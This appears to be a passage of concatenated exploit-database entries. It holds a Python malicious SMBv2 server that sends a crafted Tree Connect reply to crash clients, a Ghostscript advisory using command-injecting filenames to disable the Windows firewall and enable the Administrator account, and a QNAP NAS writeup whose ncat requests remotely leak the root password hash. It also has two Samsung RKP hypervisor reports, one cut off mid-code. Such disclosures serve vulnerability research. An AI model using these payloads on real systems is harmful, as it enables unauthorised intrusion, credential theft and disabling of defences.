AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
#Packet Struct len
self.fields["SecBlobLen"] = struct.pack("<H", len(AsnLen+CalculateSecBlob))
self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)
###### ASN Stuff
if len(CalculateSecBlob) > 255:
self.fields["Tag3ASNIdLen"] = struct.pack(">H", len(CalculateSecBlob))
else:
self.fields["Tag3ASNIdLenOfLen"] = "\x81"
self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))
if len(AsnLen+CalculateSecBlob)-3 > 255:
self.fields["ChoiceTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-4)
else:
self.fields["ChoiceTagASNLenOfLen"] = "\x81"
self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)
if len(AsnLen+CalculateSecBlob)-7 > 255:
self.fields["NegTokenTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-8)
else:
self.fields["NegTokenTagASNLenOfLen"] = "\x81"
self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-7)
tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
if len(tag2length) > 255:
self.fields["Tag2ASNIdLen"] = struct.pack(">H", len(tag2length))
else:
self.fields["Tag2ASNIdLenOfLen"] = "\x81"
self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(tag2length))
self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))
###### Workstation Offset
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
###### AvPairs Offset
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
##### Workstation Offset Calculation:
self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
##### Target Offset Calculation:
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
##### IvPair Calculation:
self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class SMB2SessionAcceptData(Packet):
fields = OrderedDict([
("Len", "\x09\x00"),
("SessionFlag", "\x01\x00"),
("SecBlobOffSet", "\x48\x00"),
("SecBlobLen", "\x1d\x00"),
("SecBlobTag0", "\xa1"),
("SecBlobTag0Len", "\x1b"),
("NegTokenResp", "\x30"),
("NegTokenRespLen", "\x19"),
("NegTokenRespTag0", "\xa0"),
("NegTokenRespTag0Len", "\x03"),
("NegStateResp", "\x0a"),
("NegTokenRespLen1", "\x01"),
("NegTokenRespStr", "\x00"),
("SecBlobTag3", "\xa3"),
("SecBlobTag3Len", "\x12"),
("SecBlobOctetHeader", "\x04"),
("SecBlobOctetLen", "\x10"),
("MechlistMICVersion", ""),# No verification on the client side...
("MechlistCheckSum", ""),
("MechlistSeqNumber", ""),
("Data", ""),
])
def calculate(self):
###### SecBlobLen Calc:
CalculateSecBlob = str(self.fields["SecBlobTag0"])+str(self.fields["SecBlobTag0Len"])+str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])
CalculateASN = str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])
MechLen = str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])
#Packet Struct len
self.fields["SecBlobLen"] = struct.pack("<h",len(CalculateSecBlob))
self.fields["SecBlobTag0Len"] = struct.pack("<B",len(CalculateASN))
self.fields["NegTokenRespLen"] = struct.pack("<B", len(CalculateASN)-2)
self.fields["SecBlobTag3Len"] = struct.pack("<B",len(MechLen))
self.fields["SecBlobOctetLen"] = struct.pack("<B",len(MechLen)-2)
class SMB2TreeData(Packet):
fields = OrderedDict([
("Len", "\x10\x00"),
("ShareType", "\x02\x00"),
("ShareFlags", "\x30\x00\x00\x00"),
("ShareCapabilities", "\x00\x00\x00\x00"),
("AccessMask", "\xff\x01\x1f\x01"),
("Data", ""),
])
##########################################################################
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(1)
print "From:", self.client_address
data = self.request.recv(1024)
##Negotiate proto answer.
if data[8:10] == "\x72\x00" and data[4:5] == "\xff":
head = SMBv2Header(CreditCharge="\x00\x00",Credits="\x01\x00",PID="\x00\x00\x00\x00")
t = SMB2NegoAns()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[*]Negotiating SMBv2."
self.request.send(buffer1)
data = self.request.recv(1024)
if data[16:18] == "\x00\x00":
CreditsRequested = data[18:20]
if CreditsRequested == "\x00\x00":
CreditsRequested = "\x01\x00"
CreditCharged = data[10:12]
head = SMBv2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
t = SMB2NegoAns(Dialect="\x02\x02")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[*]Negotiate Protocol SMBv2 packet sent."
self.request.send(buffer1)
data = self.request.recv(1024)
#Session More Work to Do
if data[16:18] == "\x01\x00":
head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID="\x4d\x00\x00\x00\x00\x04\x00\x00",NTStatus="\x16\x00\x00\xc0")
t = SMB2Session1Data()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[*]Session challenge SMBv2 packet sent."
self.request.send(buffer1)
data = self.request.recv(1024)
#Session Positive
if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02":
head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data))
t = SMB2SessionAcceptData()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(buffer1)
data = self.request.recv(1024)
## Tree Connect
if data[16:18] == "\x03\x00":
head = SMBv2Header(Cmd="\x03\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", TID="\x01\x00\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data))
t = SMB2TreeData(Data="C"*1500)#//BUG
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[*]Triggering Bug; Tree Connect SMBv2 packet sent."
self.request.send(buffer1)
data = self.request.recv(1024)
except Exception:
print "Disconnected from", self.client_address
pass
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),SMB2)
launch.serve_forever()
[+]#################################################################################################
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/GHOSTSCRIPT-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
[+]################################################################################################
Vendor:
===============
ghostscript.com
Product:
================
Ghostscript 9.20
gs920w32.exe
Windows (32 bit)
hash: fee2cc1b8b467888a4ed44dd9f4567ed
Ghostscript is a suite of software based Postscript and PDF
interpreter/renderers for file conversion.
Vulnerability Type:
==========================
Filename Command Execution
CVE Reference:
==============
N/A
Security Issue:
================
The ghostscript ps2epsi translator to processes ".ps" files executes
arbitrary commands from specially crafted filenames that contain
OS commands as part of the processed postscript files name. This feature
seems to work only using the ps2epsi translator.
Other tested GS translator calls like 'ps2pdf' fail.
c:\>ps2epsi
"Usage: ps2epsi <infile.ps> <outfile.epi>"
Example, take a file "POC&<SYSTEM-COMMAND>;1.ps", it will run arbitrary
Commands contained after the ampersand character "&".
If a user runs some automated script to call the ps2epsi translator to
process ".ps" files from a remote share or directory
where actual filename is unknown, it can potentially allow attackers to
execute arbitrary commands on victims machine.
Characters like "/", ":" are restricted in filenames, but we can abuse
Windows netsh and wmic to bypass some of these barriers.
Quick Ghostscript CL test.
Create file called Test&calc.exe;1.ps
ps2epsi "Test&calc.exe;1.ps" outfile
BOOM! calc.exe runs...
Exploit/POC:
=============
Add Ghostscript lib 'c:\Program Files (x86)\gs\gs9.20\lib' to Windows
environmental Path, so we can easily call 'ps2epsi' GS CMD.
Create the following malicious ".ps" postscript files.
1) Turn of Windows Firewall
Test&netsh Advfirewall set allprofiles state off&;1.ps
2) Enable Windows Administrator account (using WMIC).
Test&wmic useraccount where name='administrator' set disabled='false'&;1.ps
If user don't have wmic on path, fix it for POC by set environmental system
variable.
Add "C:\Windows\system32\wbem;" to 'Path' variable.
Run below bat script to process bunch of *.ps" files.
"POC.bat"
@echo off
rem ghostscript Filename Command Execution POC
rem by hyp3rlinx
for %%1 in ("*.ps") do; ps2epsi "%%1" "evil.ps"
Severity:
=========
Medium
Disclosure Timeline:
===============================
Vendor Notification: No replies
February 2, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
Device Model: QNAP VioStor NVR, QNAP NAS, Fujitsu Celvin NAS (May be additional re-branded)
Attack Vector: Remote
Attack Models:
1. Classic Heap Overflows
2. Classic Stack Overflow
3. Heap Feng Shui Overflow
4. "Heack Combo" (Heap / Stack Combination) Overflow
[Timeline]
07/01/2017:
QNAP contacted me after my post to Bugtraq 31/12/2016 (http://seclists.org/bugtraq/2017/Jan/5).
Provided additional details, never heard anything back from QNAP.
(The patched FW versions I’ve found out by myself, no feedback from QNAP)
29/01/2017:
Sent this document to QNAP <security@qnap.com>, asked for feedback and also if they have any objections before publish
31/01/2017:
No reply.
- Frankly speaking - ignorance; next batch will be Full Disclosure without any prior notice nor reply to QNAP (oOoo).
[Vulnerable]
QNAP VioStor NVR: QVR 5.1.x (Patched?)
QNAP NAS: QTS 4.3.2 Beta (Patched?)
QNAP NAS: QTS older than 4.2.3 (build 20170121)
Fujitsu Celvin NAS: older than 4.2.3 (build 20170110)
[Not Vulnerable]
QNAP NAS: QTS >= 4.2.3 (build 20170121)
Fujitsu Celvin NAS: >= 4.2.3 (build 20170110)
[Vendor security alert]
https://www.qnap.com/en/support/con_show.php?cid=108
[Vendor URL]
https://www.qnap.com/
http://www.qnapsecurity.com/
http://www.fujitsu.com/fts/products/computing/peripheral/accessories/storage/
Note: All hardcoded examples below, made with TS-251+ QTS 4.2.2 (Build 20161214)
===[ 1. Classic Heap Overflows ]===
1. Both the tags "u" (user) and "p" (password) suffer of heap overflow, that alone allows us to overwrite wilderness top chunk size.
2. The tag "pp" (sysApp) suffer of stack overflow, that alone allows to us to overwrite libc_argv[0].
Note: Local shown below, but can of course be triggered remote as well
/* Heap #1 to overwrite the heap wilderness top chunk size */
# export QUERY_STRING="u=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff"
# ./cgi.cgi
*** glibc detected *** ./cgi.cgi: double free or corruption (out): 0x0806b0d0 ***
/* Heap #2 to overwrite the heap wilderness top chunk size */
# export QUERY_STRING="u=admin&p=`for((i=0;i<260;i++));do echo -en "A";done`%ff%ff%ff%ff"
# ./cgi.cgi
*** glibc detected *** ./cgi.cgi: double free or corruption (out): 0x0806b2a0 ***
===[ 2. Classic Stack Overflow ]===
/* Stack Overflow to overwrite libc_argv[0] address pointer for reading shadow password */
# export QUERY_STRING="u=admin&pp=`for((i=0;i<4468;i++));do echo -en "A";done`%7e%c7%06%08"
# ./cgi.cgi
Content-type: text/xml
<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
<authPassed><![CDATA[0]]></authPassed></QDocRoot>
*** stack smashing detected ***: $1$$CoERg7ynjYLsj2j4glJ34. terminated
Aborted
As we can see above, the implemented GLIBC heap/stack protections works quite sufficient, pretty much nothing interesting can be achieved.
But, when we start to combining vulnerabilities, flaws and near functions with each other, things starting to get a bit more interesting.
===[ 3. Heap Feng Shui with Heap #1 and #2 Overflow ]===
/* Heap overflow with freed junk chunks, to overwrite next heap chunk header */
One of the first functions that runs in the CGI, is CGI_Get_Input(), this function takes all our input to the CGI and allocates memory on the heap for later use with CGI_Find_Parameter(); This allow us to create junk memory chunks more or less wherever we would like to have them, have them freed, and then later have them allocated for our use.
The for() loop with char "B" will create used and freed space before "p" at heap by CGI_Get_Input();
The upcoming calloc() for "u" will use this space, and the content in "u" will be copied here and overflow into "p":s heap chunk header.
[The abort() happens in <fgetpwent+402>: malloc() from Get_Exact_NAS_User_Name() call, and not in "p":s calloc()]
/* Controlling: eax, edx, esi */
# export QUERY_STRING="u=`for((i=0;i<80;i++));do echo -en "A";done`%fc%ff%ff%ff%fc%ff%ff%ffCCCC%6c%b1%06%08&QNAP=`for((i=0;i<32;i++));do echo -en "B";done`&p=PPPP"
# ./cgi.cgi
*** glibc detected *** /home/httpd/cgi-bin/cgi.cgi: corrupted double-linked list: 0x0806b154 ***
Below I will demonstrate another interesting combination found while exploring,
that easily can be exploited remotely without credentials and without any prior knowledge of the remote target.
===[ 4. "Heack Combo" (Heap / Stack Combination) Overflow ]===
/* Combined heap overflow #2 with base64 decoded stack overwrite, to remotely calculate and retrieve shadowed admin (root) password */
We will here combine the "GLIBC detected" abort message in GNU LIBC that’s triggered by an Heap Overflow, together with base64 encoded request string to cgi.cgi in QNAP devices, where the internal b64_Decode() function will (right after the heap overflow) be called and do an stack overwrite of address pointer for libc_argv[0], with the address we choose, which will allow us to read a string almost anywhere.
In this PoC we are using the address for the heap loaded admin (root) /etc/shadow password, to remotely read this string for displaying instead of the program name.
The critical part is to correctly align the request with the address pointer for libc_argv[0], and below you will find guidance for success.
Notes:
1. Sending 0x00-0xff to the stack will work just fine, since the request for "p" will be base64 decoded. (theoretically, we could rewrite the stack as how we would like to have it)
2. I’m using HTTPS/SSL to have some privacy while fuzzing, only to show some people that HTTPS/SSL don’t make them secure by default. (HTTP works of course too)
3. Right before and after the address pointer for libc_argv[0], we have (harmless?) segfaults in strlen() / getenv() due to reading of invalid addresses.
4. The "\nHost: Q†is needed with HTTPS/SSL, could be removed when using HTTP, otherwise the PoC sometimes may not work as expected. *sigh*
5. Since the given pattern for reading is static, automated tool are quite easy to develop. (with slightly adjustment of the offset for correctly reading)
6. Fingerprinting is extremely easy with the request: "GET /cgi-bin/authLogin.cgi HTTP/1.0" (provides XML list with all relevant details)
7. This PoC will not work with devices who has ASLR enabled for heap. *doh*
Credits:
QNAP, to the combination of heap overflow with base64 decoded stack overwrite, for letting us write where we want to read.
GLIBC, who give us quite vital information to calculate with, that allow us to point our reading correctly, and then reading what we want.
Now to the demonstration.
[==== (1) ====]
[Four and more bytes off below the address pointer for libc_argv[0]]
/*
You should start with fairly low number in the for() loop (around 2000 - 3000 should be fine) and work your way up to the breaking point between #1 and #2.
Note:
In the example we start with 4464 in the for() loop, only to clearly show the breaking point between #1 and #2.
*/
Example:
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4464;i++));do echo -en "\xff";done) ; AP=$"\x41\x41\x41\x41"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:40:06 GMT
*** glibc detected *** cgi.cgi: free(): invalid next size (normal): 0x0806e508 ***
[==== (2) ====]
[Three or two bytes off below the address pointer for libc_argv[0]]
/*
Note now the below "*** glibc detected ***" - it doesn’t write the program name as above in #1, this is very important first step to look for.
Note:
Two bytes off can sporadicly generate segfault, so don’t be fooled to believe you are in #3.
Recommending firstly to exactly find the first breaking point between #1 and #2 (program name).
*/
Example (three off below):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4465;i++));do echo -en "\xff";done) ; AP=$"\x41\x41\x41\x41"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:41:12 GMT
*** glibc detected *** : free(): invalid next size (normal): 0x0806e508 ***
Example (two off below):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4466;i++));do echo -en "\xff";done) ; AP=$"\x41\x41\x41\x41"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:41:52 GMT
*** glibc detected *** : free(): invalid next size (normal): 0x0806e508 ***
[==== (3) ====]
[One byte off below the address pointer for libc_argv[0]]
/*
Very important step, segfault in strlen() and we need now add one more byte to correctly overwrite the address pointer for libc_argv[0]
*/
Example (one off below):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4467;i++));do echo -en "\xff";done) ; AP=$"\x41\x41\x41\x41"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:42:26 GMT
Content-Length: 0
Connection: close
Content-Type: text/plain
[==== (4) ====]
/*
The address we looking for can be calculated from above heap message in #2 (0x0806e508) and subtracted with below offset.
Fixed offset (more or less)
NASX86: 0x16b2
NASARM: 0x1562
NASX86 example:
If we subtract the offset: 0x0806e508 - 0x16b2 = 0x0806ce56; We should directly read the hash. (if not, adjust the reading slightly with the offset)
*/
Example (correctly aligned):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QNAP=$(for((i=0;i<4468;i++));do echo -en "\xff";done) ; PWNED=$"\x56\xce\x06\x08"; echo -en "$QNAP$PWNED" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Sun, 08 Jan 2017 11:43:08 GMT
*** glibc detected *** $1$$CoERg7ynjYLsj2j4glJ34.: free(): invalid next size (normal): 0x0806e510 ***
[==== (5) ====]
/*
If we added one or more bytes above the address pointer for libc_argv[0], "400 Bad Request" will be generated or no output with "200 OK" as in #3.
If you don’t get expected results (or not any results at all), you are most probably here.
*/
[One byte off or more above the address pointer for libc_argv[0]]
Example (one or more off above):
$ echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`QN=$(for((i=0;i<4469;i++));do echo -en "\xff";done) ; AP=$"\x56\xce\x06\x08"; echo -en "$QN$AP" | base64 -w 0` HTTP/1.0\nHost: Q\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 400 Bad Request
Date: Sun, 08 Jan 2017 11:45:01 GMT
Server: http server 1.0
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=982
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
In order to protect the information processed and stored within RKP (i.e., RKP's heap and stack or the current control-flow protection key), the physical ranges in which RKP and "physmap" are located are unmapped from the stage 2 translation table upon initialization of RKP. This prevents an attacker in EL1 from accessing any of these memory regions, as such an attempt would trigger an s2 translation fault.
However, RKP provides commands which can be used in order to re-map regions in the stage 2 translation table. Most of these commands correctly perform a validation on the given address range using "physmap". However, the "rkp_set_init_page_ro" command (command code 0x51) can be used to mark a region as read-only in stage 2, and performs no such validation. Here is the approximate pseudo-code for this command:
__int64 rkp_set_init_page_ro(unsigned args* args_buffer)
{
unsigned long page_pa = rkp_get_pa(args_buffer->arg0);
if ( page_pa < rkp_get_pa(text) || page_pa >= rkp_get_pa(etext) )
{
if ( !rkp_s2_page_change_permission(page_pa, 128LL, 0, 0) )// RO, XN
return rkp_debug_log("Cred: Unable to set permission for init cred", 0LL, 0LL, 0LL);
}
else
{
rkp_debug_log("Good init CRED is within RO range", 0LL, 0LL, 0LL);
}
rkp_debug_log("init cred page", 0LL, 0LL, 0LL);
return rkp_set_pgt_bitmap(page_pa, 0);
}
The "rkp_s2_page_change_permission" function makes sure the given page is mapped in stage 2 (and if it isn't, it re-maps it). The arguments passed in by "rkp_set_init_page_ro" in this specific case mark the page as read-only and non-executable.
Regardless, the physical address ranges for RKP are already present in the stage 1 translation table:
...
[424] 0x0b5000000-0x0b5200000 [PXN: 1, UXN: 1, AP: 0]
[425] 0x0b5200000-0x0b5400000 [PXN: 1, UXN: 1, AP: 0]
[426] 0x0b5400000-0x0b5600000 [PXN: 1, UXN: 1, AP: 0]
[427] 0x0b5600000-0x0b5800000 [PXN: 1, UXN: 1, AP: 0]
[428] 0x0b5800000-0x0b5a00000 [PXN: 1, UXN: 1, AP: 0]
...
This means an attacker can simply invoke the "rkp_set_init_page_ro" command to s2-map any wanted page, and will subsequently be able to directly read from that page, even if it resides within RKP's physical address range.
I've verified this issue on an SM-G935F device, build version "XXS1APG3". The RKP version present on the device is "RKP4.2_CL7572479".
Proof of concept for the RKP stage 2 remapping issue.
This PoC s2-remaps RKP's physical address range and reads from it in EL1.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41218.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=981
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
One of the protections implemented by RKP is a security policy meant to ensure that only the "authentic" kernel code pages are executable from EL1. This mitigation is achieved by combining a few memory protection policies together, namely:
-All pages with the exception of the kernel code are marked PXN
-All kernel code pages are marked read-only in the stage 2 translation table
-Kernel data pages are never marked executable
-Kernel code pages are never marked writable
(for more information, see https://www2.samsungknox.com/en/blog/real-time-kernel-protection-rkp)
In order to explore this mitigation technique, I've written a small tool to dump the stage 1 and stage 2 translation tables for EL0/EL1. First, the initial stage 2 translation table is embedded in the VMM code, so it can be statically retrieved and analysed. Here is a short snippet from the initial stage 2 translation table (the addresses here are PAs, although RKP implements a one-to-one PA<->IPA translation, barring memory protections):
...
0x80000000-0x80200000: S2AP=11, XN=0
0x80200000-0x80400000: S2AP=11, XN=0
0x80400000-0x80600000: S2AP=11, XN=0
0x80600000-0x80800000: S2AP=11, XN=0
0x80800000-0x80a00000: S2AP=11, XN=0
0x80a00000-0x80c00000: S2AP=11, XN=0
0x80c00000-0x80e00000: S2AP=11, XN=0
0x80e00000-0x81000000: S2AP=11, XN=0
0x81000000-0x81200000: S2AP=11, XN=0
0x81200000-0x81400000: S2AP=11, XN=0
0x81400000-0x81600000: S2AP=11, XN=0
...
The physical address range above corresponds with the physical address range in which the kernel code is located. As can be seen above, this entire address range is mapped as RWX in the initial stage 2. However, obviously RKP does not leave this area unprotected, as this might allow an attacker to subvert the kernel's integrity (by writing to the kernel's code pages). When RKP is initialized (i.e., when the HVC command RKP_INIT is called from EL1), the HLOS kernel passes a structure containing the address ranges for the currently loaded kernel. Here is a short snippet from "rkp_init" (init/main.c):
static void rkp_init(void)
{
rkp_init_t init;
init.magic = RKP_INIT_MAGIC;
init.vmalloc_start = VMALLOC_START;
init.vmalloc_end = (u64)high_memory;
init.init_mm_pgd = (u64)__pa(swapper_pg_dir);
init.id_map_pgd = (u64)__pa(idmap_pg_dir);
init.rkp_pgt_bitmap = (u64)__pa(rkp_pgt_bitmap);
init.rkp_map_bitmap = (u64)__pa(rkp_map_bitmap);
init.rkp_pgt_bitmap_size = RKP_PGT_BITMAP_LEN;
init.zero_pg_addr = page_to_phys(empty_zero_page);
